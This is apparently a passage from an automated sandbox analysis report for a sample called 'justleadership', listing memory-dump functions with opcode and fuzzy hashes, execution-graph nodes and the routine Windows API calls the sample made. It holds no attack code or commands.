                                              Function 06E8CE48 Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18595014ae0fdcf46f04c6467c01d476d5ab114de3db48d91fa4278687b0b1a0
                                              • Instruction ID: 59beb0dd30f8ec1ba8853ec6e13e358f6056a9e1c65521faaa418521f58321d8
                                              • Opcode Fuzzy Hash: 18595014ae0fdcf46f04c6467c01d476d5ab114de3db48d91fa4278687b0b1a0
                                              • Instruction Fuzzy Hash: 7961E270D04318CFEB94EFA5C844BEDBBB6AF4A704F20A069D40DAB255EB345985CF50
                                              Function 06D33920 Relevance: .1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef1d10c4ae814446d1726514cf90c1b07587c975b24a6ad3212471436b662164
                                              • Instruction ID: 37b909ee873201ded7203f19c6d603390e4df0cf7df079b5ccf490eddf19eead
                                              • Opcode Fuzzy Hash: ef1d10c4ae814446d1726514cf90c1b07587c975b24a6ad3212471436b662164
                                              • Instruction Fuzzy Hash: 1951E870E042A8CFEB54CFAAD940BDDBBB6AB89300F1190AAD449B7254DB748985CF51
                                              Function 06C00040 Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2162463060.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c00000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef7bff3f3e90a6afddb00e4ef472ba84e778c321164deaa7ec8db0131901e60a
                                              • Instruction ID: af0b0dec29113bae29d40aa4fb663b36cc25774c139df56ea0ed301691a5c633
                                              • Opcode Fuzzy Hash: ef7bff3f3e90a6afddb00e4ef472ba84e778c321164deaa7ec8db0131901e60a
                                              • Instruction Fuzzy Hash: BC513BB1D056588BEB68CF2B9D447CAFAF7AFC8300F04C1FA954CA6254DB740AC58E11
                                              Function 06D33911 Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab6edaad210132e74415debdc7378392c82f4b8ded09443f01dce9a1dde1b31e
                                              • Instruction ID: cb71876e2cc14ae491e910bead4955cdb7b5b3aba4b82b2e347a8a016ac000da
                                              • Opcode Fuzzy Hash: ab6edaad210132e74415debdc7378392c82f4b8ded09443f01dce9a1dde1b31e
                                              • Instruction Fuzzy Hash: C9412770E042A8CFEB54CFAAD940BDEBBB6AF89300F1490AAD449B7350DB744985CF51
                                              Function 06C00034 Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2162463060.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c00000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6a17bd0029a6141fe4966cd15c3785d4f9ef895cbcb627a5a078a0e30f118a8
                                              • Instruction ID: 8cbe61b157612d49eaf3377f63ec970ae6af8334f91b550fa567425c1bfe4146
                                              • Opcode Fuzzy Hash: a6a17bd0029a6141fe4966cd15c3785d4f9ef895cbcb627a5a078a0e30f118a8
                                              • Instruction Fuzzy Hash: 46411CB1E056588BEB6CCF2B8D446CAFAF7AFC8340F14C1FA954CA6254DB740AC58E51
                                              Function 06B80006 Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 156e31138cb33c93b7b6c62e426cb82aaf5d83a57e5d58a4458ed86184ab554c
                                              • Instruction ID: cd10b7c6cfb36f650df2b490819ca26c8beaf460715bece74915fae0e1a087cc
                                              • Opcode Fuzzy Hash: 156e31138cb33c93b7b6c62e426cb82aaf5d83a57e5d58a4458ed86184ab554c
                                              • Instruction Fuzzy Hash: 5841A0B2E056549FEB5DCF6B9D4028AFBF3AFC9204F18C0BA944CAA225DB340546CF11
                                              Function 06E70006 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eaf6aa439caabacf6fa1580d3d528d23d20268efe631a8785291d1abc3bf45ce
                                              • Instruction ID: fb934fb4389275af4c313edbbe3eb17d73b69a62b6932741bc8f2e71a0e2415b
                                              • Opcode Fuzzy Hash: eaf6aa439caabacf6fa1580d3d528d23d20268efe631a8785291d1abc3bf45ce
                                              • Instruction Fuzzy Hash: C6313AB1D097559FD76ACF6A8C042DABBF7AFC5300F08C1EA944CAA265DB740A85CF11
                                              Function 06A40007 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58aa15b96a21874b98d07b30e712d98f45be17816fb05b9fa1cf130c38ea97f4
                                              • Instruction ID: 1d7730f34f58b304ddb2a7dea1b20736ec2c2e278eeb7b75991b575da6b74e05
                                              • Opcode Fuzzy Hash: 58aa15b96a21874b98d07b30e712d98f45be17816fb05b9fa1cf130c38ea97f4
                                              • Instruction Fuzzy Hash: 8F31C770D057588FEB59CF6B884879ABBF2AFC9304F18C0EAD448AA265DB7409858F51
                                              Function 06A40040 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18bd508d4abf340502f2eddce5d25e2a28c1482c9eb5e9b6953907c008ea64a2
                                              • Instruction ID: cedc5f9299d535d4543e5c76039f4a14633dfa7925725eb25f460507fefa49fe
                                              • Opcode Fuzzy Hash: 18bd508d4abf340502f2eddce5d25e2a28c1482c9eb5e9b6953907c008ea64a2
                                              • Instruction Fuzzy Hash: 4C418570D056188FEB68DF6AC94978EFBF6BF88304F14C0EAD40CA6264DB310A858F51
                                              Function 06A4A450 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55ea3e30a23b67b30210ffe8be2a0440d3a15fae95da684de537389d2954ebfc
                                              • Instruction ID: 0149dfb3735d13ba829f09753d90b511d1171d62ed7b561fe671355d9812c972
                                              • Opcode Fuzzy Hash: 55ea3e30a23b67b30210ffe8be2a0440d3a15fae95da684de537389d2954ebfc
                                              • Instruction Fuzzy Hash: 19311671D052588BEB68DFABCD447DDBBF2AFC9300F14D0AAD409AA259DB340A85CF40
                                              Function 06E70040 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de65ceedb0ad0708d2331ec7736bb0546846525515c7e8f043fcbd5c9d48a74e
                                              • Instruction ID: c2e18a1df5ac9b102265036972a978ac4acb9d757271cc62fdd979f59ad7b3fb
                                              • Opcode Fuzzy Hash: de65ceedb0ad0708d2331ec7736bb0546846525515c7e8f043fcbd5c9d48a74e
                                              • Instruction Fuzzy Hash: 1E21A9B1D046199BEB68CF5B98443DAFAF7BFC8304F04D1BA941CA6654DB700A858F41
                                              Function 06A4A440 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 292c71d03c77f85d16039aa6d4791671fb9ae68d0fa1c3c86c20cc4dbbda96dd
                                              • Instruction ID: 5e3c071e1348a92613405a451e778f6d8457da742be2e8d881a13191fb2a9be5
                                              • Opcode Fuzzy Hash: 292c71d03c77f85d16039aa6d4791671fb9ae68d0fa1c3c86c20cc4dbbda96dd
                                              • Instruction Fuzzy Hash: 1F21EF71E016149BEB68DF6B9D402DDBAF3AFC8300F14C0BAD40DA6614DB340A56CE54
                                              Function 06B67500 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (_kq$(_kq$(_kq$(_kq
                                              • API String ID: 0-3111510350
                                              • Opcode ID: be160038585da20c98bf3b580a147735590e038fa3fa87b873f8b3631f4e9441
                                              • Instruction ID: 80d3bfbf9865de5e135297e84cd7cc2de720adcc75c7bd4012290006f57634c6
                                              • Opcode Fuzzy Hash: be160038585da20c98bf3b580a147735590e038fa3fa87b873f8b3631f4e9441
                                              • Instruction Fuzzy Hash: E471D2B1F002048FC744AF39D8549BE7BB6EB85214B2544B9F5069B3A5DF39DC42CB91
                                              Function 06E89420 Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '$(okq$(okq$\skq
                                              • API String ID: 0-3366671484
                                              • Opcode ID: 634a13d05ba1aab3c91eb7f0c037a3d5423bf0d0d8f60df2f974614f436b008c
                                              • Instruction ID: 8f512a4bde410150d1ff84ef547d2a79926e781a8f247229e13c7bd9ce8c0796
                                              • Opcode Fuzzy Hash: 634a13d05ba1aab3c91eb7f0c037a3d5423bf0d0d8f60df2f974614f436b008c
                                              • Instruction Fuzzy Hash: D0214A70E05319DFDB64DF19C8547E9B7B6BB85300F0090A9D51E67292CB345E85CF81

                                              Execution Graph

                                              Execution Coverage:8.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:71
                                              Total number of Limit Nodes:7
                                              execution_graph 13981 18ae998 13982 18ae9de GetCurrentProcess 13981->13982 13984 18aea29 13982->13984 13985 18aea30 GetCurrentThread 13982->13985 13984->13985 13986 18aea6d GetCurrentProcess 13985->13986 13987 18aea66 13985->13987 13988 18aeaa3 13986->13988 13987->13986 13989 18aeacb GetCurrentThreadId 13988->13989 13990 18aeafc 13989->13990 13975 18acbe0 13976 18acc28 GetModuleHandleW 13975->13976 13977 18acc22 13975->13977 13978 18acc55 13976->13978 13977->13976 13979 18aebe0 DuplicateHandle 13980 18aec76 13979->13980 13991 18a46f0 13992 18a4702 13991->13992 13993 18a4710 13992->13993 14001 18a4828 13992->14001 13997 18a428c 13993->13997 13998 18a4297 13997->13998 14006 18a7158 13998->14006 14000 18a470a 14002 18a484d 14001->14002 14054 18a4928 14002->14054 14058 18a4938 14002->14058 14007 18a7163 14006->14007 14010 18a7168 14007->14010 14009 18a8abd 14009->14000 14011 18a7173 14010->14011 14014 18a7198 14011->14014 14013 18a8b9a 14013->14009 14015 18a71a3 14014->14015 14018 18a71c8 14015->14018 14017 18a8c8d 14017->14013 14020 18a71d3 14018->14020 14019 18a9e51 14019->14017 14020->14019 14022 18ae5a7 14020->14022 14023 18ae5d1 14022->14023 14024 18ae5f5 14023->14024 14027 18ae880 14023->14027 14031 18ae870 14023->14031 14024->14019 14029 18ae88d 14027->14029 14028 18ae8c7 14028->14024 14029->14028 14035 18acae8 14029->14035 14032 18ae880 14031->14032 14033 18ae8c7 14032->14033 14034 18acae8 2 API calls 14032->14034 14033->14024 14034->14033 14036 18acaf3 14035->14036 14038 18af5e0 14036->14038 14039 18aefcc 14036->14039 14038->14038 14040 18aefd7 14039->14040 14041 18a71c8 2 API calls 14040->14041 14042 18af64f 14041->14042 14043 18af65e 14042->14043 14046 18af6c8 14042->14046 14050 18af6b8 14042->14050 14043->14038 14047 18af6f6 14046->14047 14048 18af7c2 KiUserCallbackDispatcher 14047->14048 14049 18af7c7 14047->14049 14048->14049 14051 18af6f6 14050->14051 14052 18af7c2 KiUserCallbackDispatcher 14051->14052 14053 18af7c7 14051->14053 14052->14053 14056 18a4938 14054->14056 14055 18a4a3c 14055->14055 14056->14055 14062 18a459c 14056->14062 14059 18a495f 14058->14059 14060 18a459c CreateActCtxA 14059->14060 14061 18a4a3c 14059->14061 14060->14061 14063 18a59c8 CreateActCtxA 14062->14063 14065 18a5a8b 14063->14065

                                              Executed Functions

                                              Function 018AE988 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 470 18ae988-18aea27 GetCurrentProcess 474 18aea29-18aea2f 470->474 475 18aea30-18aea64 GetCurrentThread 470->475 474->475 476 18aea6d-18aeaa1 GetCurrentProcess 475->476 477 18aea66-18aea6c 475->477 479 18aeaaa-18aeac2 476->479 480 18aeaa3-18aeaa9 476->480 477->476 491 18aeac5 call 18aeb68 479->491 492 18aeac5 call 18aef48 479->492 480->479 483 18aeacb-18aeafa GetCurrentThreadId 484 18aeafc-18aeb02 483->484 485 18aeb03-18aeb65 483->485 484->485 491->483 492->483
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 018AEA16
                                              • GetCurrentThread.KERNEL32 ref: 018AEA53
                                              • GetCurrentProcess.KERNEL32 ref: 018AEA90
                                              • GetCurrentThreadId.KERNEL32 ref: 018AEAE9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: bc542f741ba797e148de002aecd7fd7b1868736b24637b505ada130239b7f83e
                                              • Instruction ID: cf3a5adabdcfc6c3f4dd556ab248ffc95fac2639687b1fd02c0a39a0859e5ce2
                                              • Opcode Fuzzy Hash: bc542f741ba797e148de002aecd7fd7b1868736b24637b505ada130239b7f83e
                                              • Instruction Fuzzy Hash: F05145B09002098FEB18DFA9D648BDEBFF1BF48314F208469D459A7260D734A984CF65
                                              Function 018AE998 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 493 18ae998-18aea27 GetCurrentProcess 497 18aea29-18aea2f 493->497 498 18aea30-18aea64 GetCurrentThread 493->498 497->498 499 18aea6d-18aeaa1 GetCurrentProcess 498->499 500 18aea66-18aea6c 498->500 502 18aeaaa-18aeac2 499->502 503 18aeaa3-18aeaa9 499->503 500->499 514 18aeac5 call 18aeb68 502->514 515 18aeac5 call 18aef48 502->515 503->502 506 18aeacb-18aeafa GetCurrentThreadId 507 18aeafc-18aeb02 506->507 508 18aeb03-18aeb65 506->508 507->508 514->506 515->506
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 018AEA16
                                              • GetCurrentThread.KERNEL32 ref: 018AEA53
                                              • GetCurrentProcess.KERNEL32 ref: 018AEA90
                                              • GetCurrentThreadId.KERNEL32 ref: 018AEAE9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: bbced0f07f865b0429108c31ec9709208ba2b4b239eccfd92dc9e21f5ed68f84
                                              • Instruction ID: ed5cd8d52f1c832f0aeaa4171b1fd5520ea3ddc02e14136d68c4277bddcaa772
                                              • Opcode Fuzzy Hash: bbced0f07f865b0429108c31ec9709208ba2b4b239eccfd92dc9e21f5ed68f84
                                              • Instruction Fuzzy Hash: A05136B09006098FEB18DFA9D648BDEBBF1BF48314F20C459D559A7360DB34A984CF65
                                              Function 018A459C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 538 18a459c-18a5a89 CreateActCtxA 541 18a5a8b-18a5a91 538->541 542 18a5a92-18a5aec 538->542 541->542 549 18a5afb-18a5aff 542->549 550 18a5aee-18a5af1 542->550 551 18a5b10 549->551 552 18a5b01-18a5b0d 549->552 550->549 554 18a5b11 551->554 552->551 554->554
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018A5A79
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 008ca5e531d45371bba5e122188f3d965a547a1c8845d3baa05ef1b5453a874a
                                              • Instruction ID: c289e5d6a8e355bee2397c173e3ed9e8b414dc9029744f0134e360c9ee0545a2
                                              • Opcode Fuzzy Hash: 008ca5e531d45371bba5e122188f3d965a547a1c8845d3baa05ef1b5453a874a
                                              • Instruction Fuzzy Hash: 6B41CFB0D0071DCBDB24DFA9C984BDEBBB5BF48304F24806AD408AB255DB756989CF90
                                              Function 018A59BC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 555 18a59bc-18a5a89 CreateActCtxA 557 18a5a8b-18a5a91 555->557 558 18a5a92-18a5aec 555->558 557->558 565 18a5afb-18a5aff 558->565 566 18a5aee-18a5af1 558->566 567 18a5b10 565->567 568 18a5b01-18a5b0d 565->568 566->565 570 18a5b11 567->570 568->567 570->570
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018A5A79
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: afe533be5a09ade980691a117ba08dff247fe4defc3fa7b5b65037eb2dcf22b9
                                              • Instruction ID: e6dc524be2d513e40a34c0450a48bd4d2294ce02b150b40f7ed94576221d0d79
                                              • Opcode Fuzzy Hash: afe533be5a09ade980691a117ba08dff247fe4defc3fa7b5b65037eb2dcf22b9
                                              • Instruction Fuzzy Hash: D241E1B0D0071DCBDB24DFA9C8847DEBBB5BF48304F20806AD408AB255DB756989CF90
                                              Function 018AEBD8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 571 18aebd8-18aec74 DuplicateHandle 572 18aec7d-18aec9a 571->572 573 18aec76-18aec7c 571->573 573->572
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018AEC67
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 12f3c2e88c5ba9171f12b35247e16c80f64cbe52179dced5e57b3bcd0db76e95
                                              • Instruction ID: 811bb5acc440227f42299b0cf27d64d33fe78d55715821650f90a817c8de0423
                                              • Opcode Fuzzy Hash: 12f3c2e88c5ba9171f12b35247e16c80f64cbe52179dced5e57b3bcd0db76e95
                                              • Instruction Fuzzy Hash: F92103B5900209DFDB10CFA9D984ADEBFF5FB48310F14842AE918A7350C378A940CFA0
                                              Function 018ACBB2 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 576 18acbb2-18acc20 578 18acc28-18acc53 GetModuleHandleW 576->578 579 18acc22-18acc25 576->579 580 18acc5c-18acc70 578->580 581 18acc55-18acc5b 578->581 579->578 581->580
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 018ACC46
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: eeefc45e0a6009a30a37395c8025deb6af029065cac5c8259782e022caf88ed5
                                              • Instruction ID: 7e063cce0e8f8bef2e9f6cc781189c023ada2925846eddb2e5c439032ecd5e76
                                              • Opcode Fuzzy Hash: eeefc45e0a6009a30a37395c8025deb6af029065cac5c8259782e022caf88ed5
                                              • Instruction Fuzzy Hash: DD218CB18053848FDB12DF69C85468EBFF0AF4A314F15849AC094AB252C3386549CFA1
                                              Function 018AEBE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 583 18aebe0-18aec74 DuplicateHandle 584 18aec7d-18aec9a 583->584 585 18aec76-18aec7c 583->585 585->584
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018AEC67
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 5b799d8a8e9c6491e1ee203586fd066673fcca5b39a277396e24a92a66c65fe9
                                              • Instruction ID: acb499c240cd987b12953080f1868aa2b83368d10d12c166d02c55b8f3beeff6
                                              • Opcode Fuzzy Hash: 5b799d8a8e9c6491e1ee203586fd066673fcca5b39a277396e24a92a66c65fe9
                                              • Instruction Fuzzy Hash: 1021E4B59002089FDB10CFAAD984ADEBFF5EB48310F14841AE918A3350C379A944CFA4
                                              Function 018ACBE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 588 18acbe0-18acc20 589 18acc28-18acc53 GetModuleHandleW 588->589 590 18acc22-18acc25 588->590 591 18acc5c-18acc70 589->591 592 18acc55-18acc5b 589->592 590->589 592->591
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 018ACC46
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2150025619.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_18a0000_justleadership.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 954c5ad631d4604df4d36d349359dfb5ef6d2d7b63b5a094d2009f22b638e7e1
                                              • Instruction ID: 5c7a48546a7c23e2f6f6cfb3d38dc88735137dd3689560afd4bec46987cb8bbb
                                              • Opcode Fuzzy Hash: 954c5ad631d4604df4d36d349359dfb5ef6d2d7b63b5a094d2009f22b638e7e1
                                              • Instruction Fuzzy Hash: 921110B6C002498FDB10DF9AC544ADEFBF4AB88320F10842AD529B7210C379A645CFA1
                                              Function 0184D3EC Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2149694987.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_184d000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d23f309ff72554a7b2d2ce239f4ccabc1a0ab1caa0afdfd27279b06344b76142
                                              • Instruction ID: 60414562bdfe020b69dcdef9ae80c0175f4c43a6a8c76fcf4cee3b019461a37e
                                              • Opcode Fuzzy Hash: d23f309ff72554a7b2d2ce239f4ccabc1a0ab1caa0afdfd27279b06344b76142
                                              • Instruction Fuzzy Hash: CD214571100208DFCB01DF98C9C0B67BF65FBA4324F20C669E9098B256C736E556C6A1
                                              Function 0184D4D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2149694987.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_184d000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5d53b5029584868e1cfaa36e2a0c2f848fc28b8ca0db7ea9038df6ed83164b4
                                              • Instruction ID: d8e1069fce9d418a43bfbed6b4fafb5fdfe556657ec0d3682e80e49c29dbf191
                                              • Opcode Fuzzy Hash: d5d53b5029584868e1cfaa36e2a0c2f848fc28b8ca0db7ea9038df6ed83164b4
                                              • Instruction Fuzzy Hash: 82212871500208DFDB05DF58D9C0B16BF65FBA8318F20C26DE9098B256CB36D556CAE1
                                              Function 0185D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2149765447.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_185d000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 041053e590082cfcaf05006531dcaf2f69e57ed80649baabde7a020c22700702
                                              • Instruction ID: be4c556c61b32e35cf427276b615f195633b72094e22de82d15eea66cecd04f1
                                              • Opcode Fuzzy Hash: 041053e590082cfcaf05006531dcaf2f69e57ed80649baabde7a020c22700702
                                              • Instruction Fuzzy Hash: CC210471504204EFDB45DF98D9C0B26BBA5FB84328F20C66DED098B356C37AE546CA61
                                              Function 0185D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
